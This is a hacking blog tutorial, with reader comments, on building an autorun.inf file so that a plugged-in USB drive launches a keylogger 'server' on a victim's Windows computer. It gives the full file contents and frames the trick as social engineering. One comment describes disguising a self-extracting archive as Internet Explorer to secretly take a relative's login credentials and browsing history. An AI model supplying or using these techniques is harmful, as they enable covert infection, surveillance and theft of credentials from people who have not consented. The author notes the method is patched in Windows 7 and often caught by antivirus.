Few months back, I had posted an article on USB Thief which is helpful to steal stored passwords on the victim computer. One of my friends – Sathyaa asked me to post on how to autorun USB programs. We will tweak Autorun.inf USB file which will help us to autorun USB programs on victim computer. I have explained the steps to autorun USB programs on Windows in the following article.
How to Autorun USB programs using Autorun.inf:
First of all, let us consider a simple situation. What happens when you plug-in USB drive to your computer??? Windows will show you a prompt box. This box is called Autoplay dialog box. On hitting OK, you will be shown the contents of this USB drive.
What we want??? To make certain files (our keylogger server, to be exact) to autorun once USB drive is plugged to computer, without any action from victim’s side. Well, I am sorry to tell you, but as far as I know, this is not possible in Windows XP, Vista and Windows 7. Disappointing??? Yes, absolutely. Then why the hell, I am writing this article??? Let me tell you. In this article, we will try our best to make sure that victim unknowingly autoruns our keylogger server. So, lets start.
Autorun.inf USB hack:
1. Open a notepad file and type the following:
[autorun]
open=server.exe
action=Run server Program
icon=server.exe
label=My Portable PC
Replace “server” with your server name everywhere in the code.
2. Save this notepad file as “autorun.inf” (without quotes).
If you are unable to create the file, download Autorun.inf USB file here.
Password: techotoys.net
3. Now, put this file into the root of your USB drive. By root, I mean the default USB folder i.e. say my USB Drive is I: , then
I:\autorun.inf
is my autorun file path. Make sure you get this correct.
4. You’ve almost completed the autorun USB hack. Now, safely remove the USB flash drive and plug-in to your victim computer. He will be shown USB dialog box like this:
5. On hitting OK, Windows will autorun USB program, in this case, the server.exe file will start running automatically. Alternately, if you open My Computer, and try to open USB drive by double clicking on it, the server.exe will install itself automatically.
So, the victim doesn’t need to open any sort of file. Whenever he will try to open the USB drive, the autorun.inf USB hack will do its work.
Note: This autorun.inf USB hack has been fixed in Windows 7 and will not work. Also, as far as I know, it is not possible to autorun USB programs on Windows and you can’t bypass the USB dialog prompt. Usually, the program that occupies first position in USB dialog box is run after hitting on OK. So, we will make sure that our server.exe occupies first position in dialog prompt.
Also, you can customize the above code to match your needs. Keep them coming in comments section.
Drawback of Autorun.inf USB hack:
Some of the antiviruses do not allow Autorun.inf file to start automatically and alert the victim of its existence. So, this Autorun.inf USB hack might not work, if AVs play their role.
This was all about the way to autorun USB programs on Windows using Autorun.inf USB file. As you might have noticed, the hack depends a lot on Social Engineering for its success. If you have faced any problem while implementing this autorun.inf USB hack, please mention it in comments.
Enjoy Autorun.inf file hack to autorun USB programs…
Article by Rajesh Chaukwale
Rajesh is a passionate tech-blogger since last 3 years. He is a Computer Science Engineering student and loves writing about computer security and blogging. You can follow him on Twitter @RajeshChaukwale
{ 16 comments… read them below or add one }
Most of the viruses using this method to accessing your computer via USB ports.
Thanks for your reply:-)
Tony – Yes, you’re right. And that’s why autorun.inf hack is detected as virus today. Thanks for dropping your comment.
sathyaa – You’re welcome friend. Keep visiting Techotoys.
Just using some software to block the autorun file from any pluged USB to your computer, you are safe 99%.
Autorun.ini allow virus.I hate autorun in USB.But in CD/DVD there is no problem.In Windows 7 sp 1 ,They Remove autorun option (in Removable Drive)
Yeah, this hack has been fixed in Windows 7.
Thanks for dropping your comment.
Of course the CD/DVD is no problem except the owner of that CD/DVD want to destroy your computer with a virus CD/DVD.
I have blocked autorun.inf using USB guardian.
thanks dude for gr8 post!
I have never used USB Guardian since Avira does the job. But, USB Guardian seems to be a nice application. Thanks for sharing your tip with us.
Keep visiting Techotoys.
thanks for the software…. after this…hopefully can secure… from unwanted virus… hate it!!
I’ve heard of using autorun.inf in CDs before, but never in USB. Wow, I never made this connection. Thanks!
– You’re welcome friend. Thanks for dropping your comment.
– It is easy to use Autorun.inf in CD/DVD, but the hack becomes tricky in USB.
Thanks for adding your views to the discussion. Keep visiting Techotoys.
Nice try but it don’t work efficiently now.
you may want to look into creating self extracting archives in winrar. you can customize the icon and change the name, i.e. make it look like the internet explorer icon and hide the file extension so “.exe” is invisible. you can make the archive extract to any directory on the victim computer as well as set your files/folders to “hidden” before archiving. this self extracting archive can also automatically run a file that was extracted after the extraction is complete. for example, i replaced the internet explorer on my moms computer with a self extracting archive that looked like internet explorer. when she double clicked, it ran a list of commands i put together and spoke some text to her as well as copying her list of recently viewed web pages and her login credentials. play with scripting and use winrar to put it where you want and execute it. have fun.
what is it for??
Hi is there anyway to use this on windows 7 then? I understand it will not autorun but what about opening the usb while on the person’s computer? Wil you then have to run all exe files individually?
Or does this not work at all on W7?
Also, would it work just fine if you just use a CD/DVD and add the inf file?
This is perplexing
Thank you!